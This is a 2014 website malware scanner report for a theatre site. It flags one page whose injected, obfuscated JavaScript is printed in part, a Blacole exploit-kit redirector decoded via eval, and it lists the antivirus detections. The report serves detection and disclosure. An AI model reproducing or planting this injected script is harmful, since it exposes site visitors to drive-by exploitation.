New scan:

Malware Scanner report for theatreduroirene.com

Malicious/Suspicious/Total urls checked
1/0/15
1 page has malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://theatreduroirene.com/
200 OK
Content-Length: 71324
Content-Type: text/html
clean
http://theatreduroirene.com/photos/
200 OK
Content-Length: 8381
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

aa=([].slice+'hjkbghkj').substr(2-1,4);if((aa=="func")||(aa=="unct"))aa=(document['createDocumentFragm'+'e'+'n'+'t']+'evweds').substr(2-1,4);if((aa=="func")||(aa=="unct")){ss=new String();s=String;12-function(){e=eval;f='fromCharCode';}();t='k';}ddd=new Date();d2=new Date(ddd.valueOf()-2);h=(ddd-d2)*-1;n=["4.5k4.5k52.5k51k16k20k50k55.5k49.5k58.5k54.5k50.5k55k58k23k51.5k50.5k58k34.5k54k50.5k54.5k50.5k55k58k57.5k33k60.5k42k48.5k51.5k39k48.5k54.5k50.5k20k19.5k49k55.5k50k60.5k19.5k20.5k45.5k24k46.5k
... 1709 bytes are skipped ...
2.5k50k58k52k19.5k22k19.5k24.5k24k19.5k20.5k29.5k51k23k57.5k50.5k58k32.5k58k58k57k52.5k49k58.5k58k50.5k20k19.5k52k50.5k52.5k51.5k52k58k19.5k22k19.5k24.5k24k19.5k20.5k29.5k4.5k4.5k4.5k50k55.5k49.5k58.5k54.5k50.5k55k58k23k51.5k50.5k58k34.5k54k50.5k54.5k50.5k55k58k57.5k33k60.5k42k48.5k51.5k39k48.5k54.5k50.5k20k19.5k49k55.5k50k60.5k19.5k20.5k45.5k24k46.5k23k48.5k56k56k50.5k55k50k33.5k52k52.5k54k50k20k51k20.5k29.5k4.5k4.5k62.5"];n=n[0].split(t);for(i=0;n.length-i>0;i++)ss+=s[f](-h*n[i]);f=ss;e(f);

Antivirus reports:

AntiVir
JS/Obfuscated.CF
Avast
JS:Redirector-NK [Trj]
Ikarus
Trojan.JS.BlacoleRef
nProtect
Trojan.JS.Iframe.ASH
K7AntiVirus
Riskware
TrendMicro-HouseCall
TROJ_GEN.RCBH1A3
Emsisoft
Trojan.JS.Iframe.ASH (B)
Comodo
Exploit.JS.Blacole.TB
McAfee-GW-Edition
JS/Exploit-Blacole.aq
DrWeb
JS.IFrame.151
Kaspersky
Trojan-Downloader.JS.Iframe.cse
Microsoft
Trojan:JS/BlacoleRef.T
TotalDefense
JS/BlacoleRef.B
Jiangmin
Trojan/Script.Gen
McAfee
JS/Exploit-Blacole.aq
NANO-Antivirus
Trojan.Url.IframeB.rrzrf
F-Secure
Trojan.JS.Iframe.ASH
AVG
HTML/Framer
Norman
Agent.ACE
GData
Trojan.JS.Iframe.ASH
Commtouch
JS/IFrame.HC.gen
BitDefender
Trojan.JS.Iframe.ASH

http://theatreduroirene.com/test404page.js
404 Not Found
Content-Length: 1806
Content-Type: text/html
clean
http://theatreduroirene.com/index.php?deb=1405375200
200 OK
Content-Length: 58303
Content-Type: text/html
clean
http://theatreduroirene.com/index.php?deb=1404770400
200 OK
Content-Length: 58223
Content-Type: text/html
clean
http://theatreduroirene.com/index.php?deb=1404165600
200 OK
Content-Length: 55122
Content-Type: text/html
clean
http://theatreduroirene.com/index.php?deb=1403560800
200 OK
Content-Length: 53894
Content-Type: text/html
clean
http://theatreduroirene.com/index.php?deb=1402956000
200 OK
Content-Length: 53894
Content-Type: text/html
clean
http://theatreduroirene.com/index.php?deb=1402351200
200 OK
Content-Length: 53894
Content-Type: text/html
clean
http://theatreduroirene.com/index.php?deb=1401746400
200 OK
Content-Length: 53894
Content-Type: text/html
clean
http://theatreduroirene.com/index.php?deb=1401141600
200 OK
Content-Length: 53887
Content-Type: text/html
clean
http://theatreduroirene.com/index.php?deb=1400536800
200 OK
Content-Length: 53886
Content-Type: text/html
clean
http://theatreduroirene.com/index.php?deb=1399932000
200 OK
Content-Length: 53886
Content-Type: text/html
clean
http://theatreduroirene.com/index.php?deb=1399327200
200 OK
Content-Length: 53886
Content-Type: text/html
clean
http://theatreduroirene.com/index.php?deb=1398722400
200 OK
Content-Length: 53894
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: theatreduroirene.com

Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 24 Jul 2014 10:24:05 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny16 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
Vary: Accept-Encoding
Content-Type: text/html
X-Powered-By: PHP/5.2.6-1+lenny16
Second query (visit from search engine):
GET / HTTP/1.1
Host: theatreduroirene.com
Referer: http://www.google.com/search?q=theatreduroirene.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=theatreduroirene.com

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://theatreduroirene.com/

Result: theatreduroirene.com is not infected or malware details are not published yet.